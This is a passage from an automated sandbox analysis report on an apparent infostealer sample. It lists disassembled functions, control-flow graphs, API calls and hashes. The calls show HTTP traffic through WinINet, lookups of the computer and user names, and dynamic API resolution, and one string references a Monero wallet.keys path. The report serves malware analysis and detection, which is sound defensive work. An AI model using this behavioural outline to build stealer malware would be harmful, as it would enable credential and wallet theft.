d4a920 call d4a8a0 call d4a800 call d4a740 call d4a920 * 2 call d4a8a0 call d4a800 * 2 call d4aad0 lstrlen call d4aad0 * 2 lstrlen call d4aad0 HttpSendRequestA 908->909 910 d34ebe-d34ec5 InternetCloseHandle 908->910 1021 d34e32-d34e5c InternetReadFile 909->1021 910->819 1022 d34e67-d34eb9 InternetCloseHandle call d4a800 1021->1022 1023 d34e5e-d34e65 1021->1023 1022->910 1023->1022 1024 d34e69-d34ea7 call d4a9b0 call d4a8a0 call d4a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34915
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D3493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDB,00000000,?,?,00000000,?,",00000000,?,008DE580), ref: 00D34DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E49
                              • InternetCloseHandle.WININET(00000000), ref: 00D34EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00D34EC5
                              • HttpOpenRequestA.WININET(00000000,008DE510,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D34B15
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • InternetCloseHandle.WININET(00000000), ref: 00D34ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                              • Instruction ID: 015246e3a188a278cd97d149910b6f34e204f363d59906de15a625a0649368e7
                              • Opcode Fuzzy Hash: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                              • Instruction Fuzzy Hash: FA12B572950118ABEB15EBA4DC92FEEB378EF54304F514199B50662091EF702F89CF72
                              Function 00D478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                              • Instruction ID: d9be1405fe409dbb5c2c492f97846bd3080d95864ed19e184bc5d73c30bd4a67
                              • Opcode Fuzzy Hash: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                              • Instruction Fuzzy Hash: 4D01A4B1A04208EFCB04DF98DD45BAEBBB8FB44B21F10425AFA45E3380D37459448BB2
                              Function 00D47850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                              • Instruction ID: 158ed1e6cd03b51b977592e2d57af3cc983e5301bb3728a85a524026342f87b8
                              • Opcode Fuzzy Hash: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                              • Instruction Fuzzy Hash: 01F04FB1944208AFC714DF98DD4ABAEBBB8EB44711F10025AFA05A2680C77455448BA2
                              Function 00D31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                              • Instruction ID: 75040abc17f4b85b396fec5a7907695b348c4a04d8747783bb06b48c9529ceab
                              • Opcode Fuzzy Hash: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                              • Instruction Fuzzy Hash: EFD05E7490030CDBCB04DFE0D8496DDBBB8FB4C312F000554DD0962340EA3054C2CAA6
                              Function 00D49C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 d49c10-d49c1a 634 d4a036-d4a0ca LoadLibraryA * 8 633->634 635 d49c20-d4a031 GetProcAddress * 43 633->635 636 d4a146-d4a14d 634->636 637 d4a0cc-d4a141 GetProcAddress * 5 634->637 635->634 638 d4a216-d4a21d 636->638 639 d4a153-d4a211 GetProcAddress * 8 636->639 637->636 640 d4a21f-d4a293 GetProcAddress * 5 638->640 641 d4a298-d4a29f 638->641 639->638 640->641 642 d4a2a5-d4a332 GetProcAddress * 6 641->642 643 d4a337-d4a33e 641->643 642->643 644 d4a344-d4a41a GetProcAddress * 9 643->644 645 d4a41f-d4a426 643->645 644->645 646 d4a4a2-d4a4a9 645->646 647 d4a428-d4a49d GetProcAddress * 5 645->647 648 d4a4dc-d4a4e3 646->648 649 d4a4ab-d4a4d7 GetProcAddress * 2 646->649 647->646 650 d4a515-d4a51c 648->650 651 d4a4e5-d4a510 GetProcAddress * 2 648->651 649->648 652 d4a612-d4a619 650->652 653 d4a522-d4a60d GetProcAddress * 10 650->653 651->650 654 d4a67d-d4a684 652->654 655 d4a61b-d4a678 GetProcAddress * 4 652->655 653->652 656 d4a686-d4a699 GetProcAddress 654->656 657 d4a69e-d4a6a5 654->657 655->654 656->657 658 d4a6a7-d4a703 GetProcAddress * 4 657->658 659 d4a708-d4a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,008C6720), ref: 00D49C2D
                              • GetProcAddress.KERNEL32(75900000,008C67E0), ref: 00D49C45
                              • GetProcAddress.KERNEL32(75900000,008D8D60), ref: 00D49C5E
                              • GetProcAddress.KERNEL32(75900000,008D8C70), ref: 00D49C76
                              • GetProcAddress.KERNEL32(75900000,008DC8E0), ref: 00D49C8E
                              • GetProcAddress.KERNEL32(75900000,008DC8C8), ref: 00D49CA7
                              • GetProcAddress.KERNEL32(75900000,008CB450), ref: 00D49CBF
                              • GetProcAddress.KERNEL32(75900000,008DCA48), ref: 00D49CD7
                              • GetProcAddress.KERNEL32(75900000,008DC8F8), ref: 00D49CF0
                              • GetProcAddress.KERNEL32(75900000,008DCA78), ref: 00D49D08
                              • GetProcAddress.KERNEL32(75900000,008DC838), ref: 00D49D20
                              • GetProcAddress.KERNEL32(75900000,008C6780), ref: 00D49D39
                              • GetProcAddress.KERNEL32(75900000,008C6920), ref: 00D49D51
                              • GetProcAddress.KERNEL32(75900000,008C6940), ref: 00D49D69
                              • GetProcAddress.KERNEL32(75900000,008C6680), ref: 00D49D82
                              • GetProcAddress.KERNEL32(75900000,008DC910), ref: 00D49D9A
                              • GetProcAddress.KERNEL32(75900000,008DC880), ref: 00D49DB2
                              • GetProcAddress.KERNEL32(75900000,008CB3D8), ref: 00D49DCB
                              • GetProcAddress.KERNEL32(75900000,008C66A0), ref: 00D49DE3
                              • GetProcAddress.KERNEL32(75900000,008DC808), ref: 00D49DFB
                              • GetProcAddress.KERNEL32(75900000,008DC9B8), ref: 00D49E14
                              • GetProcAddress.KERNEL32(75900000,008DC868), ref: 00D49E2C
                              • GetProcAddress.KERNEL32(75900000,008DC988), ref: 00D49E44
                              • GetProcAddress.KERNEL32(75900000,008C6760), ref: 00D49E5D
                              • GetProcAddress.KERNEL32(75900000,008DC9D0), ref: 00D49E75
                              • GetProcAddress.KERNEL32(75900000,008DC850), ref: 00D49E8D
                              • GetProcAddress.KERNEL32(75900000,008DCAC0), ref: 00D49EA6
                              • GetProcAddress.KERNEL32(75900000,008DCA30), ref: 00D49EBE
                              • GetProcAddress.KERNEL32(75900000,008DC928), ref: 00D49ED6
                              • GetProcAddress.KERNEL32(75900000,008DC940), ref: 00D49EEF
                              • GetProcAddress.KERNEL32(75900000,008DCA00), ref: 00D49F07
                              • GetProcAddress.KERNEL32(75900000,008DCA90), ref: 00D49F1F
                              • GetProcAddress.KERNEL32(75900000,008DC958), ref: 00D49F38
                              • GetProcAddress.KERNEL32(75900000,008D9E88), ref: 00D49F50
                              • GetProcAddress.KERNEL32(75900000,008DCA60), ref: 00D49F68
                              • GetProcAddress.KERNEL32(75900000,008DC898), ref: 00D49F81
                              • GetProcAddress.KERNEL32(75900000,008C67A0), ref: 00D49F99
                              • GetProcAddress.KERNEL32(75900000,008DCAA8), ref: 00D49FB1
                              • GetProcAddress.KERNEL32(75900000,008C6800), ref: 00D49FCA
                              • GetProcAddress.KERNEL32(75900000,008DCAD8), ref: 00D49FE2
                              • GetProcAddress.KERNEL32(75900000,008DC970), ref: 00D49FFA
                              • GetProcAddress.KERNEL32(75900000,008C65A0), ref: 00D4A013
                              • GetProcAddress.KERNEL32(75900000,008C63E0), ref: 00D4A02B
                              • LoadLibraryA.KERNEL32(008DC820,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A03D
                              • LoadLibraryA.KERNEL32(008DC9A0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A04E
                              • LoadLibraryA.KERNEL32(008DC8B0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A060
                              • LoadLibraryA.KERNEL32(008DC7F0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A072
                              • LoadLibraryA.KERNEL32(008DC9E8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A083
                              • LoadLibraryA.KERNEL32(008DCA18,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A095
                              • LoadLibraryA.KERNEL32(008DCBC8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0A7
                              • LoadLibraryA.KERNEL32(008DCC40,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0B8
                              • GetProcAddress.KERNEL32(75FD0000,008C6440), ref: 00D4A0DA
                              • GetProcAddress.KERNEL32(75FD0000,008DCCA0), ref: 00D4A0F2
                              • GetProcAddress.KERNEL32(75FD0000,008D89C0), ref: 00D4A10A
                              • GetProcAddress.KERNEL32(75FD0000,008DCB38), ref: 00D4A123
                              • GetProcAddress.KERNEL32(75FD0000,008C62A0), ref: 00D4A13B
                              • GetProcAddress.KERNEL32(6FD30000,008CB298), ref: 00D4A160
                              • GetProcAddress.KERNEL32(6FD30000,008C6660), ref: 00D4A179
                              • GetProcAddress.KERNEL32(6FD30000,008CB130), ref: 00D4A191
                              • GetProcAddress.KERNEL32(6FD30000,008DCB20), ref: 00D4A1A9
                              • GetProcAddress.KERNEL32(6FD30000,008DCD18), ref: 00D4A1C2
                              • GetProcAddress.KERNEL32(6FD30000,008C6460), ref: 00D4A1DA
                              • GetProcAddress.KERNEL32(6FD30000,008C6620), ref: 00D4A1F2
                              • GetProcAddress.KERNEL32(6FD30000,008DCBF8), ref: 00D4A20B
                              • GetProcAddress.KERNEL32(763B0000,008C6480), ref: 00D4A22C
                              • GetProcAddress.KERNEL32(763B0000,008C6520), ref: 00D4A244
                              • GetProcAddress.KERNEL32(763B0000,008DCD90), ref: 00D4A25D
                              • GetProcAddress.KERNEL32(763B0000,008DCB50), ref: 00D4A275
                              • GetProcAddress.KERNEL32(763B0000,008C6640), ref: 00D4A28D
                              • GetProcAddress.KERNEL32(750F0000,008CB180), ref: 00D4A2B3
                              • GetProcAddress.KERNEL32(750F0000,008CB158), ref: 00D4A2CB
                              • GetProcAddress.KERNEL32(750F0000,008DCD30), ref: 00D4A2E3
                              • GetProcAddress.KERNEL32(750F0000,008C6280), ref: 00D4A2FC
                              • GetProcAddress.KERNEL32(750F0000,008C65C0), ref: 00D4A314
                              • GetProcAddress.KERNEL32(750F0000,008CAEB0), ref: 00D4A32C
                              • GetProcAddress.KERNEL32(75A50000,008DCB98), ref: 00D4A352
                              • GetProcAddress.KERNEL32(75A50000,008C65E0), ref: 00D4A36A
                              • GetProcAddress.KERNEL32(75A50000,008D88C0), ref: 00D4A382
                              • GetProcAddress.KERNEL32(75A50000,008DCD00), ref: 00D4A39B
                              • GetProcAddress.KERNEL32(75A50000,008DCDA8), ref: 00D4A3B3
                              • GetProcAddress.KERNEL32(75A50000,008C63C0), ref: 00D4A3CB
                              • GetProcAddress.KERNEL32(75A50000,008C62C0), ref: 00D4A3E4
                              • GetProcAddress.KERNEL32(75A50000,008DCC10), ref: 00D4A3FC
                              • GetProcAddress.KERNEL32(75A50000,008DCD48), ref: 00D4A414
                              • GetProcAddress.KERNEL32(75070000,008C6300), ref: 00D4A436
                              • GetProcAddress.KERNEL32(75070000,008DCB68), ref: 00D4A44E
                              • GetProcAddress.KERNEL32(75070000,008DCDD8), ref: 00D4A466
                              • GetProcAddress.KERNEL32(75070000,008DCCD0), ref: 00D4A47F
                              • GetProcAddress.KERNEL32(75070000,008DCD60), ref: 00D4A497
                              • GetProcAddress.KERNEL32(74E50000,008C62E0), ref: 00D4A4B8
                              • GetProcAddress.KERNEL32(74E50000,008C64E0), ref: 00D4A4D1
                              • GetProcAddress.KERNEL32(75320000,008C6320), ref: 00D4A4F2
                              • GetProcAddress.KERNEL32(75320000,008DCCE8), ref: 00D4A50A
                              • GetProcAddress.KERNEL32(6F060000,008C6500), ref: 00D4A530
                              • GetProcAddress.KERNEL32(6F060000,008C6340), ref: 00D4A548
                              • GetProcAddress.KERNEL32(6F060000,008C6600), ref: 00D4A560
                              • GetProcAddress.KERNEL32(6F060000,008DCB08), ref: 00D4A579
                              • GetProcAddress.KERNEL32(6F060000,008C6360), ref: 00D4A591
                              • GetProcAddress.KERNEL32(6F060000,008C6560), ref: 00D4A5A9
                              • GetProcAddress.KERNEL32(6F060000,008C6580), ref: 00D4A5C2
                              • GetProcAddress.KERNEL32(6F060000,008C64A0), ref: 00D4A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00D4A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00D4A607
                              • GetProcAddress.KERNEL32(74E00000,008DCC28), ref: 00D4A629
                              • GetProcAddress.KERNEL32(74E00000,008D8910), ref: 00D4A641
                              • GetProcAddress.KERNEL32(74E00000,008DCC88), ref: 00D4A659
                              • GetProcAddress.KERNEL32(74E00000,008DCAF0), ref: 00D4A672
                              • GetProcAddress.KERNEL32(74DF0000,008C6380), ref: 00D4A693
                              • GetProcAddress.KERNEL32(6FA70000,008DCBB0), ref: 00D4A6B4
                              • GetProcAddress.KERNEL32(6FA70000,008C64C0), ref: 00D4A6CD
                              • GetProcAddress.KERNEL32(6FA70000,008DCB80), ref: 00D4A6E5
                              • GetProcAddress.KERNEL32(6FA70000,008DCD78), ref: 00D4A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                              • Instruction ID: 03d1c4cbc61866fd1660ee10c33f4ebe8bab3b610cd9e7bcac72d46d29f393c5
                              • Opcode Fuzzy Hash: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                              • Instruction Fuzzy Hash: 52621AB5504208AFD348DFA8ED8995E37F9F7CC201716851AA61DC3264D63A98C2FF63
                              Function 00D36280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 d36280-d3630b call d4a7a0 call d347b0 call d4a740 InternetOpenA StrCmpCA 1040 d36314-d36318 1033->1040 1041 d3630d 1033->1041 1042 d36509-d36525 call d4a7a0 call d4a800 * 2 1040->1042 1043 d3631e-d36342 InternetConnectA 1040->1043 1041->1040 1061 d36528-d3652d 1042->1061 1044 d36348-d3634c 1043->1044 1045 d364ff-d36503 InternetCloseHandle 1043->1045 1047 d3635a 1044->1047 1048 d3634e-d36358 1044->1048 1045->1042 1050 d36364-d36392 HttpOpenRequestA 1047->1050 1048->1050 1052 d364f5-d364f9 InternetCloseHandle 1050->1052 1053 d36398-d3639c 1050->1053 1052->1045 1055 d363c5-d36405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 d3639e-d363bf InternetSetOptionA 1053->1056 1059 d36407-d36427 call d4a740 call d4a800 * 2 1055->1059 1060 d3642c-d3644b call d48940 1055->1060 1056->1055 1059->1061 1066 d364c9-d364e9 call d4a740 call d4a800 * 2 1060->1066 1067 d3644d-d36454 1060->1067 1066->1061 1070 d364c7-d364ef InternetCloseHandle 1067->1070 1071 d36456-d36480 InternetReadFile 1067->1071 1070->1052 1075 d36482-d36489 1071->1075 1076 d3648b 1071->1076 1075->1076 1080 d3648d-d364c5 call d4a9b0 call d4a8a0 call d4a800 1075->1080 1076->1070 1080->1071
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00D50DFE,00000001,00000000,00000000,00000000), ref: 00D362E1
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D36303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36335
                              • HttpOpenRequestA.WININET(00000000,GET,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D36385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D363BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D363D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D363FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D3646D
                              • InternetCloseHandle.WININET(00000000), ref: 00D364EF
                              • InternetCloseHandle.WININET(00000000), ref: 00D364F9
                              • InternetCloseHandle.WININET(00000000), ref: 00D36503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
